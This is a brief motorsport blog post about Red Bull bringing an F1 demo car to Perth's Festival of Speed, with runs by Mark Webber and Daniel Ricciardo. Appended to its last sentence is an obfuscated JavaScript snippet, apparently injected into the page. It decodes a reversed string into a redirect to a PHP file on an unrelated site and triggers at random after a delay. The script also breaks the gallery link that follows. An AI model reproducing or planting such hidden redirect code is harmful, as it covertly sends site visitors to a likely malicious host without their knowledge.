Australia is not unfamiliar to the modern day F1 car with the Australian Grand Prix being held here in Melbourne for the past 14 years and in Adelaide prior to that.
Sydney has had Mark Webber drive his BMW Williams across the Sydney Harbour Bridge in 2005.
However Western Australia has been left in the dark and never had the opportunity to see a F1 car on their home turf. That all changed last weekend though, when Red Bull brought one of their two travelling demo cars to Perth for the Festival of Speed at Barbagello Raceway.
Mark Webber, in his first drive at Barbagello Racetrack in 17years, was joined by the recently confirmed Torro Rosso test driver and WA local Daniel Ricciardo. Most of you will know that Daniel has been stunning the F1 fratertinity recently with his raw speed and very mature demeanor.
A crowd of over 200,000 people turned up to watch Webber do two runs in his car whilst Ricciardo did one run. Mind you, he did manage to get in a massive burnout at the end to keep the crowd on their toes.
Hopefully we may see them back next year for another great show. $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/galleries/?album=all&gallery=31″ target=”_blank”>You can check out the rest of the Gallery of images HERE >>>
